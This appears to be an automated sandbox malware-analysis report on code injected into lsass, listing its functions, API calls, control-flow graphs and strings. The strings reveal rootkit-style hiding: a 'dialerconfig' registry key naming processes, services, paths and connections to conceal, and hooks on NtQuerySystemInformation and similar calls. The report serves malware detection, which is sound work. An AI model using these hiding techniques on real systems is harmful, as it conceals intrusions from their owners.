14697->14746 14699 2a291991661 14747 2a291991268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14699->14747 14701 2a29199166a 14748 2a291991268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14701->14748 14703 2a291991673 14749 2a291991000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14703->14749 14705 2a29199167c 14750 2a291991000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14705->14750 14707 2a291991685 14751 2a291991000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14707->14751 14709 2a29199168e RegOpenKeyExW 14710 2a2919916c0 RegOpenKeyExW 14709->14710 14711 2a2919918a6 14709->14711 14712 2a2919916ff RegOpenKeyExW 14710->14712 14713 2a2919916e9 14710->14713 14711->14691 14714 2a29199173a RegOpenKeyExW 14712->14714 14715 2a291991723 14712->14715 14752 2a2919912bc RegQueryInfoKeyW 14713->14752 14719 2a29199175e 14714->14719 14720 2a291991775 RegOpenKeyExW 14714->14720 14761 2a29199104c RegQueryInfoKeyW 14715->14761 14722 2a2919912bc 16 API calls 14719->14722 14723 2a2919917b0 RegOpenKeyExW 14720->14723 14724 2a291991799 14720->14724 14725 2a29199176b RegCloseKey 14722->14725 14727 2a2919917eb RegOpenKeyExW 14723->14727 14728 2a2919917d4 14723->14728 14726 2a2919912bc 16 API calls 14724->14726 14725->14720 14731 2a2919917a6 RegCloseKey 14726->14731 14729 2a29199180f 14727->14729 14730 2a291991826 RegOpenKeyExW 14727->14730 14732 2a2919912bc 16 API calls 14728->14732 14734 2a29199104c 6 API calls 14729->14734 14735 2a29199184a 14730->14735 14736 2a291991861 RegOpenKeyExW 14730->14736 14731->14723 14733 2a2919917e1 RegCloseKey 14732->14733 14733->14727 14737 2a29199181c RegCloseKey 14734->14737 14738 2a29199104c 6 API calls 14735->14738 14739 2a29199189c RegCloseKey 14736->14739 14740 2a291991885 14736->14740 14737->14730 14741 2a291991857 RegCloseKey 14738->14741 14739->14711 14742 2a29199104c 6 API calls 14740->14742 14741->14736 14743 2a291991892 RegCloseKey 14742->14743 14743->14739 14744->14695 14745->14697 14746->14699 14747->14701 14748->14703 14749->14705 14750->14707 14751->14709 14753 2a29199148a RegCloseKey 14752->14753 14754 2a291991327 GetProcessHeap HeapAlloc 14752->14754 14753->14712 14755 2a291991352 RegEnumValueW 14754->14755 14756 2a291991476 GetProcessHeap HeapFree 14754->14756 14757 2a2919913a5 14755->14757 14756->14753 14757->14755 14757->14756 14758 2a29199152c 2 API calls 14757->14758 14759 2a29199141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 14757->14759 14760 2a2919913d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14757->14760 14758->14757 14759->14757 14760->14759 14762 2a2919911b5 RegCloseKey 14761->14762 14765 2a2919910bf 14761->14765 14762->14714 14763 2a2919910cf RegEnumValueW 14763->14765 14764 2a29199114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14764->14765 14765->14762 14765->14763 14765->14764 14766 2a29199202c 14767 2a29199205d 14766->14767 14768 2a291992173 14767->14768 14775 2a291992081 14767->14775 14779 2a29199213e 14767->14779 14769 2a2919921e7 14768->14769 14770 2a291992178 14768->14770 14772 2a2919921ec 14769->14772 14769->14779 14787 2a291992f04 GetProcessHeap HeapAlloc 14770->14787 14774 2a291992f04 11 API calls 14772->14774 14773 2a2919920b9 StrCmpNIW 14773->14775 14777 2a291992190 14774->14777 14775->14773 14776 2a2919920e0 14775->14776 14775->14779 14776->14775 14780 2a291991bf4 14776->14780 14777->14777 14777->14779 14781 2a291991c1b GetProcessHeap HeapAlloc 14780->14781 14782 2a291991c8f 14780->14782 14781->14782 14783 2a291991c56 14781->14783 14782->14776 14784 2a291991c77 GetProcessHeap HeapFree 14783->14784 14785 2a29199152c 2 API calls 14783->14785 14784->14782 14786 2a291991c6e 14785->14786 14786->14784 14791 2a291992f57 14787->14791 14788 2a291993015 GetProcessHeap HeapFree 14788->14777 14789 2a291993010 14789->14788 14790 2a291992fa2 StrCmpNIW 14790->14791 14791->14788 14791->14789 14791->14790 14792 2a291991bf4 6 API calls 14791->14792 14792->14791 14793 2a2911c273c 14796 2a2911c276a 14793->14796 14794 2a2911c2858 LoadLibraryA 14794->14796 14795 2a2911c28d4 14796->14794 14796->14795

                                                        Executed Functions

                                                        Function 000002A29199253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 5 2a29199253c-2a2919925c0 call 2a2919b2cc0 8 2a2919925c6-2a2919925c9 5->8 9 2a2919927d8-2a2919927fb 5->9 8->9 10 2a2919925cf-2a2919925dd 8->10 10->9 11 2a2919925e3-2a291992629 call 2a291998c60 * 3 GetFileType 10->11 18 2a29199262b-2a29199263f StrCpyW 11->18 19 2a291992641-2a29199264b call 2a291991a40 11->19 20 2a291992650-2a291992654 18->20 19->20 22 2a29199265a-2a291992673 call 2a2919930a8 call 2a291993844 20->22 23 2a2919926ff-2a291992704 20->23 35 2a2919926aa-2a2919926f4 call 2a2919b2cc0 22->35 36 2a291992675-2a2919926a4 call 2a2919930a8 call 2a291993044 call 2a291991cac 22->36 25 2a291992707-2a29199270c 23->25 27 2a29199270e-2a291992711 25->27 28 2a291992729 25->28 27->28 31 2a291992713-2a291992716 27->31 29 2a29199272c-2a291992745 call 2a2919930a8 call 2a291993844 28->29 47 2a291992787-2a291992789 29->47 48 2a291992747-2a291992776 call 2a2919930a8 call 2a291993044 call 2a291991cac 29->48 31->28 33 2a291992718-2a29199271b 31->33 33->28 37 2a29199271d-2a291992720 33->37 35->9 49 2a2919926fa 35->49 36->9 36->35 37->28 40 2a291992722-2a291992727 37->40 40->28 40->29 50 2a29199278b-2a2919927a5 47->50 51 2a2919927aa-2a2919927ad 47->51 48->47 68 2a291992778-2a291992783 48->68 49->22 50->25 54 2a2919927af-2a2919927b5 51->54 55 2a2919927b7-2a2919927ba 51->55 54->9 58 2a2919927bc-2a2919927bf 55->58 59 2a2919927d5 55->59 58->59 62 2a2919927c1-2a2919927c4 58->62 59->9 62->59 64 2a2919927c6-2a2919927c9 62->64 64->59 66 2a2919927cb-2a2919927ce 64->66 66->59 69 2a2919927d0-2a2919927d3 66->69 68->9 70 2a291992785 68->70 69->9 69->59 70->25
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction ID: b60ce313c48d00840e0b1213c085003e09fb0053b976659188ccf0f46ed53324
                                                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction Fuzzy Hash: B0717F263007A2C7F6A99E2BDA483AF6694F38EF84F640026DD0953B8DDF35D64D8741
                                                        Function 000002A29199202C Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 162COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 72 2a29199202c-2a291992057 call 2a2919b2d00 74 2a29199205d-2a291992066 72->74 75 2a29199206f-2a291992072 74->75 76 2a291992068-2a29199206c 74->76 77 2a291992223-2a291992243 75->77 78 2a291992078-2a29199207b 75->78 76->75 79 2a291992081-2a291992093 78->79 80 2a291992173-2a291992176 78->80 79->77 83 2a291992099-2a2919920a5 79->83 81 2a2919921e7-2a2919921ea 80->81 82 2a291992178-2a291992192 call 2a291992f04 80->82 81->77 87 2a2919921ec-2a2919921ff call 2a291992f04 81->87 82->77 92 2a291992198-2a2919921ae 82->92 85 2a2919920d3-2a2919920de call 2a291991bbc 83->85 86 2a2919920a7-2a2919920b7 83->86 93 2a2919920ff-2a291992111 85->93 100 2a2919920e0-2a2919920f8 call 2a291991bf4 85->100 86->85 89 2a2919920b9-2a2919920d1 StrCmpNIW 86->89 87->77 99 2a291992201-2a291992209 87->99 89->85 89->93 92->77 98 2a2919921b0-2a2919921cc 92->98 96 2a291992121-2a291992123 93->96 97 2a291992113-2a291992115 93->97 103 2a29199212a 96->103 104 2a291992125-2a291992128 96->104 101 2a29199211c-2a29199211f 97->101 102 2a291992117-2a29199211a 97->102 105 2a2919921d0-2a2919921e3 98->105 99->77 106 2a29199220b-2a291992213 99->106 100->93 112 2a2919920fa-2a2919920fd 100->112 109 2a29199212d-2a291992130 101->109 102->109 103->109 104->109 105->105 110 2a2919921e5 105->110 111 2a291992216-2a291992221 106->111 113 2a29199213e-2a291992141 109->113 114 2a291992132-2a291992138 109->114 110->77 111->77 111->111 112->109 113->77 115 2a291992147-2a29199214b 113->115 114->83 114->113 116 2a29199214d-2a291992150 115->116 117 2a291992162-2a29199216e 115->117 116->77 118 2a291992156-2a29199215b 116->118 117->77 118->115 119 2a29199215d 118->119 119->77
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: S$dialer
                                                        • API String ID: 756756679-3873981283
                                                        • Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                        • Instruction ID: 31f48a6878fe19fac89be96b3cc806bef6c18fe058c887360822b4faed0dbcc7
                                                        • Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                        • Instruction Fuzzy Hash: BC519F76B10636C7FBADCB2BEA4866E63A5F70AB94F249011DE0512B49DF35C85DC301
                                                        Function 000002A291991A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: a357d2d52508768e3afd4e1e04428e6709925dc5c1eedb762baf769dbdce5509
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: 04F03622304652D3FBA08B2AFA8875A6761F75DF98FE44020DA4946598DE6CC64DCB01
                                                        Function 000002A291991000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: 5b325dc3880ca3c93f8f4c7f4460fba72f6c1ea06a067b14687c409243df247f
                                                        • Instruction ID: 86e556b0d161359026d3ca046b5028f94ccd685030e32d18bd1b6eadd8f9c152
                                                        • Opcode Fuzzy Hash: 5b325dc3880ca3c93f8f4c7f4460fba72f6c1ea06a067b14687c409243df247f
                                                        • Instruction Fuzzy Hash: 2EE06D79711614C3FB488B27D90824A3AA1FB8DF02F948020C90907350DF38949CC611
                                                        Function 000002A29199328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: 58e4f2d2b6d44b688d357d41d78580bd9e8a4ecd447c4753187665df867a6417
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: E4115E30750663C3F7E09F7BFB4E35B2294A79EF45FB04128991A41699EF78D28C8212
                                                        Function 000002A291991ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000002A291991628: GetProcessHeap.KERNEL32 ref: 000002A291991633
                                                          • Part of subcall function 000002A291991628: HeapAlloc.KERNEL32 ref: 000002A291991642
                                                          • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A2919916B2
                                                          • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A2919916DF
                                                          • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A2919916F9
                                                          • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A291991719
                                                          • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A291991734
                                                          • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A291991754
                                                          • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A29199176F
                                                          • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A29199178F
                                                          • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A2919917AA
                                                          • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A2919917CA
                                                        • Sleep.KERNEL32 ref: 000002A291991AD7
                                                        • SleepEx.KERNELBASE ref: 000002A291991ADD
                                                          • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A2919917E5
                                                          • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A291991805
                                                          • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A291991820
                                                          • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A291991840
                                                          • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A29199185B
                                                          • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A29199187B
                                                          • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A291991896
                                                          • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A2919918A0
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: 3c2d3c73657fef33275c25727780f265ec2bd7433f006fbc608fa0bc8dfbb08e
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: 2231ED61700662C3FBD09B2BD74936B13A5BB4EFE9F2854318E0B8729DEE14C45D8212
                                                        Function 000002A2911C273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 177 2a2911c273c-2a2911c27a4 call 2a2911c29d4 * 4 186 2a2911c27aa-2a2911c27ad 177->186 187 2a2911c29b2 177->187 186->187 189 2a2911c27b3-2a2911c27b6 186->189 188 2a2911c29b4-2a2911c29d0 187->188 189->187 190 2a2911c27bc-2a2911c27bf 189->190 190->187 191 2a2911c27c5-2a2911c27e6 190->191 191->187 193 2a2911c27ec-2a2911c280c 191->193 194 2a2911c280e-2a2911c2836 193->194 195 2a2911c2838-2a2911c283f 193->195 194->194 194->195 196 2a2911c28df-2a2911c28e6 195->196 197 2a2911c2845-2a2911c2852 195->197 198 2a2911c28ec-2a2911c2901 196->198 199 2a2911c2992-2a2911c29b0 196->199 197->196 200 2a2911c2858-2a2911c286a LoadLibraryA 197->200 198->199 201 2a2911c2907 198->201 199->188 202 2a2911c28ca-2a2911c28d2 200->202 203 2a2911c286c-2a2911c2878 200->203 206 2a2911c290d-2a2911c2921 201->206 202->200 204 2a2911c28d4-2a2911c28d9 202->204 207 2a2911c28c5-2a2911c28c8 203->207 204->196 209 2a2911c2982-2a2911c298c 206->209 210 2a2911c2923-2a2911c2934 206->210 207->202 208 2a2911c287a-2a2911c287d 207->208 214 2a2911c287f-2a2911c28a5 208->214 215 2a2911c28a7-2a2911c28b7 208->215 209->199 209->206 212 2a2911c293f-2a2911c2943 210->212 213 2a2911c2936-2a2911c293d 210->213 217 2a2911c294d-2a2911c2951 212->217 218 2a2911c2945-2a2911c294b 212->218 216 2a2911c2970-2a2911c2980 213->216 219 2a2911c28ba-2a2911c28c1 214->219 215->219 216->209 216->210 220 2a2911c2963-2a2911c2967 217->220 221 2a2911c2953-2a2911c2961 217->221 218->216 219->207 220->216 223 2a2911c2969-2a2911c296c 220->223 221->216 223->216
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2798699900.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a2911c0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: b4be3b6af767c20a18f202599a4ffb0d2b1a842901df5322d96555700405c82d
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: B4610532B016B2D7DBA4CF1A900476E7392F755FA4F688121DE5907788EF38D85AE702

                                                        Non-executed Functions

                                                        Function 000002A291992B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 471 2a291992b2c-2a291992ba5 call 2a2919b2ce0 474 2a291992bab-2a291992bb1 471->474 475 2a291992ee0-2a291992f03 471->475 474->475 476 2a291992bb7-2a291992bba 474->476 476->475 477 2a291992bc0-2a291992bc3 476->477 477->475 478 2a291992bc9-2a291992bd9 GetModuleHandleA 477->478 479 2a291992bdb-2a291992beb GetProcAddress 478->479 480 2a291992bed 478->480 481 2a291992bf0-2a291992c0e 479->481 480->481 481->475 483 2a291992c14-2a291992c33 StrCmpNIW 481->483 483->475 484 2a291992c39-2a291992c3d 483->484 484->475 485 2a291992c43-2a291992c4d 484->485 485->475 486 2a291992c53-2a291992c5a 485->486 486->475 487 2a291992c60-2a291992c73 486->487 488 2a291992c83 487->488 489 2a291992c75-2a291992c81 487->489 490 2a291992c86-2a291992c8a 488->490 489->490 491 2a291992c9a 490->491 492 2a291992c8c-2a291992c98 490->492 493 2a291992c9d-2a291992ca7 491->493 492->493 494 2a291992d9d-2a291992da1 493->494 495 2a291992cad-2a291992cb0 493->495 498 2a291992ed2-2a291992eda 494->498 499 2a291992da7-2a291992daa 494->499 496 2a291992cc2-2a291992ccc 495->496 497 2a291992cb2-2a291992cbf call 2a29199199c 495->497 501 2a291992cce-2a291992cdb 496->501 502 2a291992d00-2a291992d0a 496->502 497->496 498->475 498->487 503 2a291992dbb-2a291992dc5 499->503 504 2a291992dac-2a291992db8 call 2a29199199c 499->504 501->502 508 2a291992cdd-2a291992cea 501->508 509 2a291992d3a-2a291992d3d 502->509 510 2a291992d0c-2a291992d19 502->510 505 2a291992df5-2a291992df8 503->505 506 2a291992dc7-2a291992dd4 503->506 504->503 516 2a291992dfa-2a291992e03 call 2a291991bbc 505->516 517 2a291992e05-2a291992e12 lstrlenW 505->517 506->505 515 2a291992dd6-2a291992de3 506->515 518 2a291992ced-2a291992cf3 508->518 512 2a291992d4b-2a291992d58 lstrlenW 509->512 513 2a291992d3f-2a291992d49 call 2a291991bbc 509->513 510->509 519 2a291992d1b-2a291992d28 510->519 521 2a291992d7b-2a291992d8d call 2a291993844 512->521 522 2a291992d5a-2a291992d64 512->522 513->512 525 2a291992d93-2a291992d98 513->525 523 2a291992de6-2a291992dec 515->523 516->517 533 2a291992e4a-2a291992e55 516->533 527 2a291992e35-2a291992e3f call 2a291993844 517->527 528 2a291992e14-2a291992e1e 517->528 518->525 526 2a291992cf9-2a291992cfe 518->526 529 2a291992d2b-2a291992d31 519->529 521->525 537 2a291992e42-2a291992e44 521->537 522->521 532 2a291992d66-2a291992d79 call 2a29199152c 522->532 523->533 534 2a291992dee-2a291992df3 523->534 525->537 526->502 526->518 527->537 528->527 538 2a291992e20-2a291992e33 call 2a29199152c 528->538 529->525 539 2a291992d33-2a291992d38 529->539 532->521 532->525 541 2a291992ecc-2a291992ed0 533->541 542 2a291992e57-2a291992e5b 533->542 534->505 534->523 537->498 537->533 538->527 538->533 539->509 539->529 541->498 546 2a291992e5d-2a291992e61 542->546 547 2a291992e63-2a291992e7d call 2a2919985c0 542->547 546->547 550 2a291992e80-2a291992e83 546->550 547->550 553 2a291992e85-2a291992ea3 call 2a2919985c0 550->553 554 2a291992ea6-2a291992ea9 550->554 553->554 554->541 556 2a291992eab-2a291992ec9 call 2a2919985c0 554->556 556->541
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: 043e66a94291c1a102d958949189fb88a9b9732a4a50de77dbbc8e9e83f4211b
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: 76B1A022311A62C3FBD88F6AD6487AA63A4F74AF84F645016EE0957798DF35CC4CC341
                                                        Function 000002A291997D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: 44736799373c9efb6451b95b64b9a47d87deab4c0848c0c6155269827a27a6b7
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: 7C314C72305B91CAFBA49F65E8443EE7360F789B44F54402ADA4D47A98EF38C64CCB10
                                                        Function 000002A29199D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: c9b0c7b1d200b93522009db0479c6571555f4cb46859bdbeb309bed3194aa6ce
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: 50316332314B91C6EBA0CF2AE94439E73A4F78AB54F600115EA9D43B98DF38C54DCB01
                                                        Function 000002A291991628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 2135414181-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: 265f4212d38ea3b3e46c55dae75a9839ab9f88983801d7ae21ce8a3aa47b5e51
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: E171EA26310A22C7FB909F6BE95869E23B4F78AF9CF511121D94E47BA9DE34C48CC741
                                                        Function 000002A2919912BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: 188830453a345198aa7934d318025cb7fa0c86e460bd2f7c13c811caed25026c
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: C9513636200B95C7EB94CF6AE64835BBBA1F78EF99F644124DA4A07758DF38D04D8B01
                                                        Function 000002A291991D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: 72976cce3cdeaaa03b07112629cfa60ab1e39ff48f18b917d1b00f2fb3e72a4e
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
